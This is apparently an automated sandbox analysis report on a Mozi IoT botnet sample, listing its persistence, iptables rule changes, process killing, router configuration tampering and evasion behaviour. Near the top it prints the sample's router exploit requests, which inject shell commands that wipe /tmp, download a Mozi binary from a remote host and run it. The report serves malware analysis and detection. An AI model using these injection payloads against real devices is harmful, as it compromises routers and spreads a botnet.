Source: Initial sample Potential command found: POST /HNAP1/ HTTP/1.0
Source: Initial sample Potential command found: GET /language/Swedish${IFS}&&cd${IFS}/tmp;rm${IFS}-rf${IFS}*;wget${IFS}http://%s:%d/Mozi.a;sh${IFS}/tmp/Mozi.a&>r&&tar${IFS}/string.js HTTP/1.0
Source: Initial sample Potential command found: GET /shell?cd+/tmp;rm+-rf+*;wget+http://%s:%d/Mozi.a;chmod+777+Mozi.a;/tmp/Mozi.a+jaws HTTP/1.1
Source: Initial sample Potential command found: POST /soap.cgi?service=WANIPConn1 HTTP/1.1
Source: Initial sample Potential command found: GET /cgi-bin/;cd${IFS}/var/tmp;rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://%s:%d/Mozi.m;${IFS}sh${IFS}/var/tmp/Mozi.m
Source: Initial sample Potential command found: GET /board.cgi?cmd=cd+/tmp;rm+-rf+*;wget+http://%s:%d/Mozi.a;chmod+777+Mozi.a;/tmp/Mozi.a+varcron
Sample has stripped symbol table
Source: ELF static info symbol of initial sample .symtab present: no
Yara signature match
Source: nT7K5GG5km, type: SAMPLE Matched rule: SUSP_XORed_Mozilla date = 2019-10-28, author = Florian Roth, description = Detects suspicious XORed keyword - Mozilla/5.0, reference = Internal Research, score =
Source: /usr/networks, type: DROPPED Matched rule: SUSP_XORed_Mozilla date = 2019-10-28, author = Florian Roth, description = Detects suspicious XORed keyword - Mozilla/5.0, reference = Internal Research, score =
Source: classification engine Classification label: mal100.spre.troj.evad.lin@0/221@4/0

Persistence and Installation Behavior:

Executes the "iptables" command to insert, remove and/or manipulate rules
Source: /bin/sh (PID: 4638) Iptables executable using switch for changing the iptables rules: /sbin/iptables -> iptables -I INPUT -p tcp --destination-port 44040 -j ACCEPT
Source: /bin/sh (PID: 4672) Iptables executable using switch for changing the iptables rules: /sbin/iptables -> iptables -I OUTPUT -p tcp --source-port 44040 -j ACCEPT
Source: /bin/sh (PID: 4679) Iptables executable using switch for changing the iptables rules: /sbin/iptables -> iptables -I PREROUTING -t nat -p tcp --destination-port 44040 -j ACCEPT
Source: /bin/sh (PID: 4720) Iptables executable using switch for changing the iptables rules: /sbin/iptables -> iptables -I POSTROUTING -t nat -p tcp --source-port 44040 -j ACCEPT
Source: /bin/sh (PID: 4732) Iptables executable using switch for changing the iptables rules: /sbin/iptables -> iptables -I INPUT -p tcp --dport 44040 -j ACCEPT
Source: /bin/sh (PID: 4755) Iptables executable using switch for changing the iptables rules: /sbin/iptables -> iptables -I OUTPUT -p tcp --sport 44040 -j ACCEPT
Source: /bin/sh (PID: 4763) Iptables executable using switch for changing the iptables rules: /sbin/iptables -> iptables -I PREROUTING -t nat -p tcp --dport 44040 -j ACCEPT
Source: /bin/sh (PID: 4785) Iptables executable using switch for changing the iptables rules: /sbin/iptables -> iptables -I POSTROUTING -t nat -p tcp --sport 44040 -j ACCEPT
Source: /bin/sh (PID: 4815) Iptables executable using switch for changing the iptables rules: /sbin/iptables -> iptables -I INPUT -p tcp --destination-port 58000 -j DROP
Source: /bin/sh (PID: 4819) Iptables executable using switch for changing the iptables rules: /sbin/iptables -> iptables -I OUTPUT -p tcp --source-port 58000 -j DROP
Source: /bin/sh (PID: 4838) Iptables executable using switch for changing the iptables rules: /sbin/iptables -> iptables -I INPUT -p tcp --dport 58000 -j DROP
Source: /bin/sh (PID: 4866) Iptables executable using switch for changing the iptables rules: /sbin/iptables -> iptables -I OUTPUT -p tcp --sport 58000 -j DROP
Source: /bin/sh (PID: 4896) Iptables executable using switch for changing the iptables rules: /sbin/iptables -> iptables -I INPUT -p tcp --destination-port 35000 -j DROP
Source: /bin/sh (PID: 4915) Iptables executable using switch for changing the iptables rules: /sbin/iptables -> iptables -I INPUT -p tcp --destination-port 50023 -j DROP
Source: /bin/sh (PID: 4939) Iptables executable using switch for changing the iptables rules: /sbin/iptables -> iptables -I OUTPUT -p tcp --source-port 50023 -j DROP
Source: /bin/sh (PID: 4966) Iptables executable using switch for changing the iptables rules: /sbin/iptables -> iptables -I OUTPUT -p tcp --source-port 35000 -j DROP
Source: /bin/sh (PID: 4986) Iptables executable using switch for changing the iptables rules: /sbin/iptables -> iptables -I INPUT -p tcp --destination-port 7547 -j DROP
Source: /bin/sh (PID: 4992) Iptables executable using switch for changing the iptables rules: /sbin/iptables -> iptables -I OUTPUT -p tcp --source-port 7547 -j DROP
Source: /bin/sh (PID: 5015) Iptables executable using switch for changing the iptables rules: /sbin/iptables -> iptables -I INPUT -p tcp --dport 35000 -j DROP
Source: /bin/sh (PID: 5042) Iptables executable using switch for changing the iptables rules: /sbin/iptables -> iptables -I INPUT -p tcp --dport 50023 -j DROP
Source: /bin/sh (PID: 5063) Iptables executable using switch for changing the iptables rules: /sbin/iptables -> iptables -I OUTPUT -p tcp --sport 50023 -j DROP
Source: /bin/sh (PID: 5071) Iptables executable using switch for changing the iptables rules: /sbin/iptables -> iptables -I OUTPUT -p tcp --sport 35000 -j DROP
Source: /bin/sh (PID: 5095) Iptables executable using switch for changing the iptables rules: /sbin/iptables -> iptables -I INPUT -p tcp --dport 7547 -j DROP
Source: /bin/sh (PID: 5119) Iptables executable using switch for changing the iptables rules: /sbin/iptables -> iptables -I OUTPUT -p tcp --sport 7547 -j DROP
Source: /bin/sh (PID: 5139) Iptables executable using switch for changing the iptables rules: /sbin/iptables -> iptables -I INPUT -p udp --destination-port 8080 -j ACCEPT
Source: /bin/sh (PID: 5158) Iptables executable using switch for changing the iptables rules: /sbin/iptables -> iptables -I OUTPUT -p udp --source-port 8080 -j ACCEPT
Source: /bin/sh (PID: 5167) Iptables executable using switch for changing the iptables rules: /sbin/iptables -> iptables -I PREROUTING -t nat -p udp --destination-port 8080 -j ACCEPT
Source: /bin/sh (PID: 5194) Iptables executable using switch for changing the iptables rules: /sbin/iptables -> iptables -I POSTROUTING -t nat -p udp --source-port 8080 -j ACCEPT
Source: /bin/sh (PID: 5215) Iptables executable using switch for changing the iptables rules: /sbin/iptables -> iptables -I INPUT -p udp --dport 8080 -j ACCEPT
Source: /bin/sh (PID: 5229) Iptables executable using switch for changing the iptables rules: /sbin/iptables -> iptables -I OUTPUT -p udp --sport 8080 -j ACCEPT
Source: /bin/sh (PID: 5253) Iptables executable using switch for changing the iptables rules: /sbin/iptables -> iptables -I PREROUTING -t nat -p udp --dport 8080 -j ACCEPT
Source: /bin/sh (PID: 5265) Iptables executable using switch for changing the iptables rules: /sbin/iptables -> iptables -I POSTROUTING -t nat -p udp --sport 8080 -j ACCEPT
Sample reads /proc/mounts (often used for finding a writable filesystem)
Source: /tmp/nT7K5GG5km (PID: 4600) File: /proc/4600/mounts
Sample tries to persist itself using /etc/profile
Source: /tmp/nT7K5GG5km (PID: 4600) File: /etc/profile.d/cedilla-portuguese.sh
Source: /tmp/nT7K5GG5km (PID: 4600) File: /etc/profile.d/apps-bin-path.sh
Source: /tmp/nT7K5GG5km (PID: 4600) File: /etc/profile.d/Z97-byobu.sh
Source: /tmp/nT7K5GG5km (PID: 4600) File: /etc/profile.d/bash_completion.sh
Source: /tmp/nT7K5GG5km (PID: 4600) File: /etc/profile.d/vte-2.91.sh
Sample tries to persist itself using System V runlevels
Source: /tmp/nT7K5GG5km (PID: 4600) File: /etc/rcS.d/S95baby.sh
Source: /tmp/nT7K5GG5km (PID: 4600) File: /etc/rc.local
Terminates several processes with shell command 'killall'
Source: /bin/sh (PID: 4604) Killall command executed: killall -9 telnetd utelnetd scfgmgr
Enumerates processes within the "proc" file system
Source: /usr/bin/killall (PID: 4604) File opened: /proc/4294/stat
Source: /usr/bin/killall (PID: 4604) File opened: /proc/230/stat
Source: /usr/bin/killall (PID: 4604) File opened: /proc/231/stat
Source: /usr/bin/killall (PID: 4604) File opened: /proc/232/stat
Source: /usr/bin/killall (PID: 4604) File opened: /proc/233/stat
Source: /usr/bin/killall (PID: 4604) File opened: /proc/234/stat
Source: /usr/bin/killall (PID: 4604) File opened: /proc/3512/stat
Source: /usr/bin/killall (PID: 4604) File opened: /proc/359/stat
Source: /usr/bin/killall (PID: 4604) File opened: /proc/1452/stat
Source: /usr/bin/killall (PID: 4604) File opened: /proc/3632/stat
Source: /usr/bin/killall (PID: 4604) File opened: /proc/4600/stat
Source: /usr/bin/killall (PID: 4604) File opened: /proc/4602/stat
Source: /usr/bin/killall (PID: 4604) File opened: /proc/3518/stat
Source: /usr/bin/killall (PID: 4604) File opened: /proc/10/stat
Source: /usr/bin/killall (PID: 4604) File opened: /proc/1339/stat
Source: /usr/bin/killall (PID: 4604) File opened: /proc/4605/stat
Source: /usr/bin/killall (PID: 4604) File opened: /proc/11/stat
Source: /usr/bin/killall (PID: 4604) File opened: /proc/12/stat
Source: /usr/bin/killall (PID: 4604) File opened: /proc/13/stat
Source: /usr/bin/killall (PID: 4604) File opened: /proc/14/stat
Source: /usr/bin/killall (PID: 4604) File opened: /proc/15/stat
Source: /usr/bin/killall (PID: 4604) File opened: /proc/16/stat
Source: /usr/bin/killall (PID: 4604) File opened: /proc/17/stat
Source: /usr/bin/killall (PID: 4604) File opened: /proc/18/stat
Source: /usr/bin/killall (PID: 4604) File opened: /proc/19/stat
Source: /usr/bin/killall (PID: 4604) File opened: /proc/483/stat
Source: /usr/bin/killall (PID: 4604) File opened: /proc/3527/stat
Source: /usr/bin/killall (PID: 4604) File opened: /proc/3527/cmdline
Source: /usr/bin/killall (PID: 4604) File opened: /proc/1/stat
Source: /usr/bin/killall (PID: 4604) File opened: /proc/2/stat
Source: /usr/bin/killall (PID: 4604) File opened: /proc/3525/stat
Source: /usr/bin/killall (PID: 4604) File opened: /proc/3/stat
Source: /usr/bin/killall (PID: 4604) File opened: /proc/1346/stat
Source: /usr/bin/killall (PID: 4604) File opened: /proc/3524/stat
Source: /usr/bin/killall (PID: 4604) File opened: /proc/3524/cmdline
Source: /usr/bin/killall (PID: 4604) File opened: /proc/4/stat
Source: /usr/bin/killall (PID: 4604) File opened: /proc/3523/stat
Source: /usr/bin/killall (PID: 4604) File opened: /proc/5/stat
Source: /usr/bin/killall (PID: 4604) File opened: /proc/7/stat
Source: /usr/bin/killall (PID: 4604) File opened: /proc/8/stat
Source: /usr/bin/killall (PID: 4604) File opened: /proc/9/stat
Source: /usr/bin/killall (PID: 4604) File opened: /proc/20/stat
Source: /usr/bin/killall (PID: 4604) File opened: /proc/21/stat
Source: /usr/bin/killall (PID: 4604) File opened: /proc/22/stat
Source: /usr/bin/killall (PID: 4604) File opened: /proc/23/stat
Source: /usr/bin/killall (PID: 4604) File opened: /proc/24/stat
Source: /usr/bin/killall (PID: 4604) File opened: /proc/25/stat
Source: /usr/bin/killall (PID: 4604) File opened: /proc/28/stat
Source: /usr/bin/killall (PID: 4604) File opened: /proc/29/stat
Source: /usr/bin/killall (PID: 4604) File opened: /proc/1363/stat
Source: /usr/bin/killall (PID: 4604) File opened: /proc/3541/stat
Source: /usr/bin/killall (PID: 4604) File opened: /proc/3541/cmdline
Source: /usr/bin/killall (PID: 4604) File opened: /proc/1362/stat
Source: /usr/bin/killall (PID: 4604) File opened: /proc/496/stat
Source: /usr/bin/killall (PID: 4604) File opened: /proc/496/cmdline
Source: /usr/bin/killall (PID: 4604) File opened: /proc/30/stat
Source: /usr/bin/killall (PID: 4604) File opened: /proc/31/stat
Source: /usr/bin/killall (PID: 4604) File opened: /proc/31/cmdline
Source: /usr/bin/killall (PID: 4604) File opened: /proc/1119/stat
Source: /usr/bin/killall (PID: 4604) File opened: /proc/3790/stat
Source: /usr/bin/killall (PID: 4604) File opened: /proc/3791/stat
Source: /usr/bin/killall (PID: 4604) File opened: /proc/3310/stat
Source: /usr/bin/killall (PID: 4604) File opened: /proc/3431/stat
Source: /usr/bin/killall (PID: 4604) File opened: /proc/3431/cmdline
Source: /usr/bin/killall (PID: 4604) File opened: /proc/3550/stat
Source: /usr/bin/killall (PID: 4604) File opened: /proc/260/stat
Source: /usr/bin/killall (PID: 4604) File opened: /proc/263/stat
Source: /usr/bin/killall (PID: 4604) File opened: /proc/264/stat
Source: /usr/bin/killall (PID: 4604) File opened: /proc/385/stat
Source: /usr/bin/killall (PID: 4604) File opened: /proc/144/stat
Source: /usr/bin/killall (PID: 4604) File opened: /proc/386/stat
Source: /usr/bin/killall (PID: 4604) File opened: /proc/145/stat
Source: /usr/bin/killall (PID: 4604) File opened: /proc/146/stat
Source: /usr/bin/killall (PID: 4604) File opened: /proc/3546/stat
Source: /usr/bin/killall (PID: 4604) File opened: /proc/3546/cmdline
Source: /usr/bin/killall (PID: 4604) File opened: /proc/147/stat
Source: /usr/bin/killall (PID: 4604) File opened: /proc/3303/stat
Source: /usr/bin/killall (PID: 4604) File opened: /proc/3545/stat
Source: /usr/bin/killall (PID: 4604) File opened: /proc/148/stat
Source: /usr/bin/killall (PID: 4604) File opened: /proc/149/stat
Source: /usr/bin/killall (PID: 4604) File opened: /proc/3543/stat
Source: /usr/bin/killall (PID: 4604) File opened: /proc/822/stat
Source: /usr/bin/killall (PID: 4604) File opened: /proc/822/cmdline
Source: /usr/bin/killall (PID: 4604) File opened: /proc/3308/stat
Source: /usr/bin/killall (PID: 4604) File opened: /proc/3308/cmdline
Source: /usr/bin/killall (PID: 4604) File opened: /proc/3429/stat
Source: /usr/bin/killall (PID: 4604) File opened: /proc/3429/cmdline
Source: /usr/bin/killall (PID: 4604) File opened: /proc/47/stat
Source: /usr/bin/killall (PID: 4604) File opened: /proc/48/stat
Source: /usr/bin/killall (PID: 4604) File opened: /proc/48/cmdline
Source: /usr/bin/killall (PID: 4604) File opened: /proc/49/stat
Source: /usr/bin/killall (PID: 4604) File opened: /proc/150/stat
Source: /usr/bin/killall (PID: 4604) File opened: /proc/271/stat
Source: /usr/bin/killall (PID: 4604) File opened: /proc/151/stat
Source: /usr/bin/killall (PID: 4604) File opened: /proc/152/stat
Source: /usr/bin/killall (PID: 4604) File opened: /proc/153/stat
Source: /usr/bin/killall (PID: 4604) File opened: /proc/395/stat
Source: /usr/bin/killall (PID: 4604) File opened: /proc/396/stat
Source: /usr/bin/killall (PID: 4604) File opened: /proc/154/stat
Source: /usr/bin/killall (PID: 4604) File opened: /proc/155/stat
Source: /usr/bin/killall (PID: 4604) File opened: /proc/156/stat
Source: /usr/bin/killall (PID: 4604) File opened: /proc/1017/stat
Source: /usr/bin/killall (PID: 4604) File opened: /proc/157/stat
Source: /usr/bin/killall (PID: 4604) File opened: /proc/158/stat
Source: /usr/bin/killall (PID: 4604) File opened: /proc/159/stat
Executes commands using a shell command-line interpreter
Source: /tmp/nT7K5GG5km (PID: 4602) Shell command executed: /bin/sh -c "killall -9 telnetd utelnetd scfgmgr"
Source: /tmp/nT7K5GG5km (PID: 4636) Shell command executed: /bin/sh -c "iptables -I INPUT -p tcp --destination-port 44040 -j ACCEPT"
Source: /tmp/nT7K5GG5km (PID: 4670) Shell command executed: /bin/sh -c "iptables -I OUTPUT -p tcp --source-port 44040 -j ACCEPT"
Source: /tmp/nT7K5GG5km (PID: 4674) Shell command executed: /bin/sh -c "iptables -I PREROUTING -t nat -p tcp --destination-port 44040 -j ACCEPT"
Source: /tmp/nT7K5GG5km (PID: 4715) Shell command executed: /bin/sh -c "iptables -I POSTROUTING -t nat -p tcp --source-port 44040 -j ACCEPT"
Source: /tmp/nT7K5GG5km (PID: 4724) Shell command executed: /bin/sh -c "iptables -I INPUT -p tcp --dport 44040 -j ACCEPT"
Source: /tmp/nT7K5GG5km (PID: 4750) Shell command executed: /bin/sh -c "iptables -I OUTPUT -p tcp --sport 44040 -j ACCEPT"
Source: /tmp/nT7K5GG5km (PID: 4759) Shell command executed: /bin/sh -c "iptables -I PREROUTING -t nat -p tcp --dport 44040 -j ACCEPT"
Source: /tmp/nT7K5GG5km (PID: 4775) Shell command executed: /bin/sh -c "iptables -I POSTROUTING -t nat -p tcp --sport 44040 -j ACCEPT"
Source: /tmp/nT7K5GG5km (PID: 4813) Shell command executed: /bin/sh -c "iptables -I INPUT -p tcp --destination-port 58000 -j DROP"
Source: /tmp/nT7K5GG5km (PID: 4816) Shell command executed: /bin/sh -c "iptables -I OUTPUT -p tcp --source-port 58000 -j DROP"
Source: /tmp/nT7K5GG5km (PID: 4828) Shell command executed: /bin/sh -c "iptables -I INPUT -p tcp --dport 58000 -j DROP"
Source: /tmp/nT7K5GG5km (PID: 4855) Shell command executed: /bin/sh -c "iptables -I OUTPUT -p tcp --sport 58000 -j DROP"
Source: /tmp/nT7K5GG5km (PID: 4882) Shell command executed: /bin/sh -c "cfgtool set /mnt/jffs2/hw_ctree.xml InternetGatewayDevice.ManagementServer URL \"http://127.0.0.1\""
Source: /tmp/nT7K5GG5km (PID: 4891) Shell command executed: /bin/sh -c "cfgtool set /mnt/jffs2/hw_ctree.xml InternetGatewayDevice.ManagementServer ConnectionRequestPassword \"acsMozi\""
Source: /tmp/nT7K5GG5km (PID: 4893) Shell command executed: /bin/sh -c "iptables -I INPUT -p tcp --destination-port 35000 -j DROP"
Source: /tmp/nT7K5GG5km (PID: 4904) Shell command executed: /bin/sh -c "iptables -I INPUT -p tcp --destination-port 50023 -j DROP"
Source: /tmp/nT7K5GG5km (PID: 4931) Shell command executed: /bin/sh -c "iptables -I OUTPUT -p tcp --source-port 50023 -j DROP"
Source: /tmp/nT7K5GG5km (PID: 4955) Shell command executed: /bin/sh -c "iptables -I OUTPUT -p tcp --source-port 35000 -j DROP"
Source: /tmp/nT7K5GG5km (PID: 4979) Shell command executed: /bin/sh -c "iptables -I INPUT -p tcp --destination-port 7547 -j DROP"
Source: /tmp/nT7K5GG5km (PID: 4988) Shell command executed: /bin/sh -c "iptables -I OUTPUT -p tcp --source-port 7547 -j DROP"
Source: /tmp/nT7K5GG5km (PID: 5005) Shell command executed: /bin/sh -c "iptables -I INPUT -p tcp --dport 35000 -j DROP"
Source: /tmp/nT7K5GG5km (PID: 5031) Shell command executed: /bin/sh -c "iptables -I INPUT -p tcp --dport 50023 -j DROP"
Source: /tmp/nT7K5GG5km (PID: 5057) Shell command executed: /bin/sh -c "iptables -I OUTPUT -p tcp --sport 50023 -j DROP"
Source: /tmp/nT7K5GG5km (PID: 5065) Shell command executed: /bin/sh -c "iptables -I OUTPUT -p tcp --sport 35000 -j DROP"
Source: /tmp/nT7K5GG5km (PID: 5085) Shell command executed: /bin/sh -c "iptables -I INPUT -p tcp --dport 7547 -j DROP"
Source: /tmp/nT7K5GG5km (PID: 5111) Shell command executed: /bin/sh -c "iptables -I OUTPUT -p tcp --sport 7547 -j DROP"
Source: /tmp/nT7K5GG5km (PID: 5137) Shell command executed: /bin/sh -c "iptables -I INPUT -p udp --destination-port 8080 -j ACCEPT"
Source: /tmp/nT7K5GG5km (PID: 5149) Shell command executed: /bin/sh -c "iptables -I OUTPUT -p udp --source-port 8080 -j ACCEPT"
Source: /tmp/nT7K5GG5km (PID: 5160) Shell command executed: /bin/sh -c "iptables -I PREROUTING -t nat -p udp --destination-port 8080 -j ACCEPT"
Source: /tmp/nT7K5GG5km (PID: 5182) Shell command executed: /bin/sh -c "iptables -I POSTROUTING -t nat -p udp --source-port 8080 -j ACCEPT"
Source: /tmp/nT7K5GG5km (PID: 5210) Shell command executed: /bin/sh -c "iptables -I INPUT -p udp --dport 8080 -j ACCEPT"
Source: /tmp/nT7K5GG5km (PID: 5219) Shell command executed: /bin/sh -c "iptables -I OUTPUT -p udp --sport 8080 -j ACCEPT"
Source: /tmp/nT7K5GG5km (PID: 5248) Shell command executed: /bin/sh -c "iptables -I PREROUTING -t nat -p udp --dport 8080 -j ACCEPT"
Source: /tmp/nT7K5GG5km (PID: 5257) Shell command executed: /bin/sh -c "iptables -I POSTROUTING -t nat -p udp --sport 8080 -j ACCEPT"
Executes the "iptables" command used for managing IP filtering and manipulation
Source: /bin/sh (PID: 4638) Iptables executable: /sbin/iptables -> iptables -I INPUT -p tcp --destination-port 44040 -j ACCEPT
Source: /bin/sh (PID: 4672) Iptables executable: /sbin/iptables -> iptables -I OUTPUT -p tcp --source-port 44040 -j ACCEPT
Source: /bin/sh (PID: 4679) Iptables executable: /sbin/iptables -> iptables -I PREROUTING -t nat -p tcp --destination-port 44040 -j ACCEPT
Source: /bin/sh (PID: 4720) Iptables executable: /sbin/iptables -> iptables -I POSTROUTING -t nat -p tcp --source-port 44040 -j ACCEPT
Source: /bin/sh (PID: 4732) Iptables executable: /sbin/iptables -> iptables -I INPUT -p tcp --dport 44040 -j ACCEPT
Source: /bin/sh (PID: 4755) Iptables executable: /sbin/iptables -> iptables -I OUTPUT -p tcp --sport 44040 -j ACCEPT
Source: /bin/sh (PID: 4763) Iptables executable: /sbin/iptables -> iptables -I PREROUTING -t nat -p tcp --dport 44040 -j ACCEPT
Source: /bin/sh (PID: 4785) Iptables executable: /sbin/iptables -> iptables -I POSTROUTING -t nat -p tcp --sport 44040 -j ACCEPT
Source: /bin/sh (PID: 4815) Iptables executable: /sbin/iptables -> iptables -I INPUT -p tcp --destination-port 58000 -j DROP
Source: /bin/sh (PID: 4819) Iptables executable: /sbin/iptables -> iptables -I OUTPUT -p tcp --source-port 58000 -j DROP
Source: /bin/sh (PID: 4838) Iptables executable: /sbin/iptables -> iptables -I INPUT -p tcp --dport 58000 -j DROP
Source: /bin/sh (PID: 4866) Iptables executable: /sbin/iptables -> iptables -I OUTPUT -p tcp --sport 58000 -j DROP
Source: /bin/sh (PID: 4896) Iptables executable: /sbin/iptables -> iptables -I INPUT -p tcp --destination-port 35000 -j DROP
Source: /bin/sh (PID: 4915) Iptables executable: /sbin/iptables -> iptables -I INPUT -p tcp --destination-port 50023 -j DROP
Source: /bin/sh (PID: 4939) Iptables executable: /sbin/iptables -> iptables -I OUTPUT -p tcp --source-port 50023 -j DROP
Source: /bin/sh (PID: 4966) Iptables executable: /sbin/iptables -> iptables -I OUTPUT -p tcp --source-port 35000 -j DROP
Source: /bin/sh (PID: 4986) Iptables executable: /sbin/iptables -> iptables -I INPUT -p tcp --destination-port 7547 -j DROP
Source: /bin/sh (PID: 4992) Iptables executable: /sbin/iptables -> iptables -I OUTPUT -p tcp --source-port 7547 -j DROP
Source: /bin/sh (PID: 5015) Iptables executable: /sbin/iptables -> iptables -I INPUT -p tcp --dport 35000 -j DROP
Source: /bin/sh (PID: 5042) Iptables executable: /sbin/iptables -> iptables -I INPUT -p tcp --dport 50023 -j DROP
Source: /bin/sh (PID: 5063) Iptables executable: /sbin/iptables -> iptables -I OUTPUT -p tcp --sport 50023 -j DROP
Source: /bin/sh (PID: 5071) Iptables executable: /sbin/iptables -> iptables -I OUTPUT -p tcp --sport 35000 -j DROP
Source: /bin/sh (PID: 5095) Iptables executable: /sbin/iptables -> iptables -I INPUT -p tcp --dport 7547 -j DROP
Source: /bin/sh (PID: 5119) Iptables executable: /sbin/iptables -> iptables -I OUTPUT -p tcp --sport 7547 -j DROP
Source: /bin/sh (PID: 5139) Iptables executable: /sbin/iptables -> iptables -I INPUT -p udp --destination-port 8080 -j ACCEPT
Source: /bin/sh (PID: 5158) Iptables executable: /sbin/iptables -> iptables -I OUTPUT -p udp --source-port 8080 -j ACCEPT
Source: /bin/sh (PID: 5167) Iptables executable: /sbin/iptables -> iptables -I PREROUTING -t nat -p udp --destination-port 8080 -j ACCEPT
Source: /bin/sh (PID: 5194) Iptables executable: /sbin/iptables -> iptables -I POSTROUTING -t nat -p udp --source-port 8080 -j ACCEPT
Source: /bin/sh (PID: 5215) Iptables executable: /sbin/iptables -> iptables -I INPUT -p udp --dport 8080 -j ACCEPT
Source: /bin/sh (PID: 5229) Iptables executable: /sbin/iptables -> iptables -I OUTPUT -p udp --sport 8080 -j ACCEPT
Source: /bin/sh (PID: 5253) Iptables executable: /sbin/iptables -> iptables -I PREROUTING -t nat -p udp --dport 8080 -j ACCEPT
Source: /bin/sh (PID: 5265) Iptables executable: /sbin/iptables -> iptables -I POSTROUTING -t nat -p udp --sport 8080 -j ACCEPT
Reads system information from the proc file system
Source: /tmp/nT7K5GG5km (PID: 4627) Reads from proc file: /proc/stat
Sample tries to set the executable flag
Source: /tmp/nT7K5GG5km (PID: 4600) File: /usr/networks (bits: - usr: rx grp: rx all: rwx)
Source: /tmp/nT7K5GG5km (PID: 4600) File: /etc/rcS.d/S95baby.sh (bits: - usr: rx grp: rx all: rwx)
Source: /tmp/nT7K5GG5km (PID: 4600) File: /etc/init.d/S95baby.sh (bits: - usr: rx grp: rx all: rwx)
Writes ELF files to disk
Source: /tmp/nT7K5GG5km (PID: 4600) File written: /usr/networks
Writes shell script files to disk
Source: /tmp/nT7K5GG5km (PID: 4600) Shell script file created: /etc/rcS.d/S95baby.sh
Source: /tmp/nT7K5GG5km (PID: 4600) Shell script file created: /etc/init.d/S95baby.sh
Source: submitted sample Stderr:
    telnetd: no process found
    utelnetd: no process found
    scfgmgr: no process found
    Unsupported ioctl: cmd=0xffffffff80045705
    Unsupported ioctl: cmd=0xffffffff80045705
    Unsupported ioctl: cmd=0xffffffff80045705
    /bin/sh: 1: cfgtool: not found
    /bin/sh: 1: cfgtool: not found
    Unsupported ioctl: cmd=0xffffffff80045705
    Unsupported ioctl: cmd=0xffffffff80045705
    exit code = 0

Hooking and other Techniques for Hiding and Protection:

Drops files in suspicious directories
Source: /tmp/nT7K5GG5km (PID: 4600) File: /etc/init.d/S95baby.sh
Source: /tmp/nT7K5GG5km (PID: 4600) File: /etc/init.d/mountall.sh
Source: /tmp/nT7K5GG5km (PID: 4600) File: /etc/init.d/checkfs.sh
Source: /tmp/nT7K5GG5km (PID: 4600) File: /etc/init.d/umountnfs.sh
Source: /tmp/nT7K5GG5km (PID: 4600) File: /etc/init.d/mountkernfs.sh
Source: /tmp/nT7K5GG5km (PID: 4600) File: /etc/init.d/checkroot-bootclean.sh
Source: /tmp/nT7K5GG5km (PID: 4600) File: /etc/init.d/mountnfs-bootclean.sh
Source: /tmp/nT7K5GG5km (PID: 4600) File: /etc/init.d/bootmisc.sh
Source: /tmp/nT7K5GG5km (PID: 4600) File: /etc/init.d/checkroot.sh
Source: /tmp/nT7K5GG5km (PID: 4600) File: /etc/init.d/hwclock.sh
Source: /tmp/nT7K5GG5km (PID: 4600) File: /etc/init.d/hostname.sh
Source: /tmp/nT7K5GG5km (PID: 4600) File: /etc/init.d/mountdevsubfs.sh
Source: /tmp/nT7K5GG5km (PID: 4600) File: /etc/init.d/mountall-bootclean.sh
Source: /tmp/nT7K5GG5km (PID: 4600) File: /etc/init.d/mountnfs.sh
Source: /tmp/nT7K5GG5km (PID: 4600) File: /usr/bin/gettext.sh
Source: /tmp/nT7K5GG5km (PID: 4600) File: /usr/sbin/alsa-info.sh
Uses known network protocols on non-standard ports
Source: unknown Network traffic detected: HTTP traffic on port 52478 -> 8443
Source: unknown Network traffic detected: HTTP traffic on port 45994 -> 81 (this entry appears 8 times in the report)
Source: unknown Network traffic detected: HTTP traffic on port 53350 -> 8443
Source: unknown Network traffic detected: HTTP traffic on port 54390 -> 49152
Source: unknown Network traffic detected: HTTP traffic on port 49152 -> 54390

Malware Analysis System Evasion:

Uses the "uname" system call to query kernel version information (possible evasion)
Source: /tmp/nT7K5GG5km (PID: 4587) Queries kernel information via 'uname'
Source: /tmp/nT7K5GG5km (PID: 4600) Queries kernel information via 'uname'
Source: /tmp/nT7K5GG5km (PID: 4623) Queries kernel information via 'uname'
Source: /sbin/modprobe (PID: 4639) Queries kernel information via 'uname'
Source: /usr/share/apport/apport-gtk (PID: 5330) Queries kernel information via 'uname'
Source: /usr/share/apport/apport-gtk (PID: 5349) Queries kernel information via 'uname'
Source: kvm-test-1-run.sh.8.dr Binary or memory string: ( $QEMU $qemu_args -m 512 -kernel $resdir/bzImage -append "$qemu_append $boot_args"; echo $? > $resdir/qemu-retval ) &
Source: functions.sh0.8.dr Binary or memory string: # Usually this will be one of